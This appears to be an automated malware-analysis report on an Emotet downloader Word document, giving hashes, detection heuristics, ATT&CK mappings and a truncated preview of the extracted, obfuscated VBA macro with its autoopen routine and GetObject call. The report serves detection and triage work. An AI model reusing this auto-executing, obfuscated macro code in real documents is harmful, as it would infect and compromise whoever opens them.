Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d66a73e7d803173b…

MALICIOUS

Office (OLE)

220.8 KB Created: 2019-04-01 18:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: bab6d7394ad7810f5880d9ec18997a07 SHA-1: d5cad39eba8ba031ee0707e279b7647222e352c6 SHA-256: d66a73e7d803173bde8d7093e162b4a4479be814ef3011b6fae57b4a4c20fc7f
222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6921756-0, strongly indicating the Emotet family. High-severity heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes GetObject, a common technique for executing malicious code. The VBA script, though obfuscated, is structured to likely download and execute a second-stage payload, consistent with Emotet's downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6921756-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6921756-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23884 bytes
SHA-256: 87798c8d8db9f69a528dd96d7ff6dca4390b0ba97a3a46353be10b1eb3d0ec73
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UxUAAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "QxGAUQDC"
Attribute VB_Base = "0{57629663-E036-4A6F-98F0-EFF1E6C31B65}{06A2F77C-5374-400D-AD23-F82BA0AC5778}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "NDXkAAA"
Attribute VB_Base = "0{5967D98C-5D6F-4A78-A6F7-9CA8D94BFEF5}{74302BEE-3749-4E9E-81A6-489870EAD665}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wwBAAA1x"
Function OAA_GwCA()
   YACAGQx _
= CStr(mXkDBXQ + 698450640 + 350634897 _
* CDate(GD4AAQDZ * ChrW(883638388 / CDate(TA4AAAZC)))) _
+ Rnd(jAZCDC + (124688293 + 150388653) * _
CDate(vAAUDX * CVar(317727142 / CDate(jZADCA))))
   bAU4AkA _
= CStr(iQDZCGB + 377517511 + 90003137 _
* CDate(PXAAwAD * ChrW(387573194 / CDate(jAwBoAA)))) _
+ Rnd(BQU_xDZw + (213450782 + 104039902) * _
CDate(VAo1AcAD * CVar(592200374 / CDate(GAcDBGDA))))
End Function
Function fAAU1B()
   TAkAcAw _
= CStr(AGAAoCD + 871673702 + 247233444 _
* CDate(OC1AAABG * ChrW(601838641 / CDate(FoAAAA)))) _
+ Rnd(cAQoQB + (252395938 + 975920353) * _
CDate(kDA4AUA * CVar(969792812 / CDate(d_QBAUBD))))
   WBUD4x _
= CStr(qxoBAAU + 187523751 + 43528182 _
* CDate(YxAAUZ4A * ChrW(587407696 / CDate(HZAoAAQD)))) _
+ Rnd(vxxCwUc + (220246866 + 650023877) * _
CDate(vDAxAB * CVar(305836183 / CDate(PBAooD4A))))
End Function
Sub autoopen()
YBkBADQA
End Sub
Function YBkBADQA()
On Error Resume Next
   ZAAU1GA1 _
= CStr(icoXoADA + 28051417 + 804982137 _
* CDate(RAAA_c * ChrW(789459752 / CDate(ZQQABoD)))) _
+ Rnd(Q__ZAG + (333692387 + 467096383) * _
CDate(U4BGXAkA * CVar(274311250 / CDate(EZGwDw))))
   zoAo1c _
= CStr(sQG1A_ + 879776174 + 997078623 _
* CDate(mAwAkABB * ChrW(744036726 / CDate(aCADCBZ)))) _
+ Rnd(sAACAQw + (215786790 + 23107145) * _
CDate(aA4UXAAA * CVar(586315993 / CDate(MoUA4oC))))
Set kGwCcA = GetObject(QxGAUQDC.iQAAXD.Text + NDXkAAA.sUA4DAA + QxGAUQDC.iQAAXD.Text)
   j1AABAD _
= CStr(qUcQAcB + 843784000 + 580643588 _
* CDate(jQxDoU * ChrW(464691084 / CDate(zA1X_AA)))) _
+ Rnd(jxGkAAAX + (483773686 + 458340497) * _
CDate(jAUXQBA * CVar(693308014 / CDate(ixAQXD))))
   O_kxxc _
= CStr(EXXokAB + 196257180 + 14056298 _
* CDate(UxwA_4_ * ChrW(316560217 / CDate(YAAcQ41)))) _
+ Rnd(bAXko_ + (31434075 + 563092247) * _
CDate(j4QUQwxA * CVar(708958964 / CDate(bAAx4BA))))
   mAkxQw _
= CStr(jBDBAB + 806235266 + 799568753 _
* CDate(nABAoA1Q * ChrW(932596828 / CDate(TDQAoAB)))) _
+ Rnd(qQ14AUA + (131962361 + 742008906) * _
CDate(F1DDcD * CVar(585522769 / CDate(mx1AQ1_A))))
If 981942 = 981942 Then
   F1Q1kkU _
= CStr(woADZwx + 484678435 + 56112644 _
* CDate(TAwxAQB * ChrW(93766251 / CDate(GAQ4AAUD)))) _
+ Rnd(wGGUDQ + (955100207 + 903254977) * _
CDate(wUQA1DD * CVar(751842407 / CDate(N1wGAUC))))
   WwAQA1A _
= CStr(VwBAQAw + 192267095 + 442301121 _
* CDate(bABxCAXc * ChrW(190418476 / CDate(KGkAwcB)))) _
+ Rnd(BAAXACUD + (907030320 + 355235254) * _
CDate(UXcAAABG * CVar(133907537 / CDate(wAxoQ_))))
   nDADc4 _
= CStr(nDZBcA_c + 187277649 + 736415139 _
* CDate(hw_AADoX * ChrW(853578821 / CDate(FQZGDUXw)))) _
+ Rnd(iAAZAD + (340148745 + 831142149) * _
CDate(z4CZQA * CVar(844793074 / CDate(kXAUAUA))))
kGwCcA. _
ShOwWiNdOw = QxGAUQDC.NCZ1XCC4 + QxGAUQDC.NCZ1XCC4 + QxGAUQDC.NCZ1XCC4
   ZAQBQBQ _
= CStr(nxcQwBAA + 720530856 + 587226502 _
* CDate(rAZkZU * ChrW(919297338 / CDate(YCAoBQ4)))) _
+ Rnd(fAZAcoAG + (212741025 + 170423378) * _
CDate(DAAAAcAU * CVar(25855566 / CDate(DD1DXoGx))))
   oAA4AC _
= CStr(MQUDAk + 164459281 + 98728
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.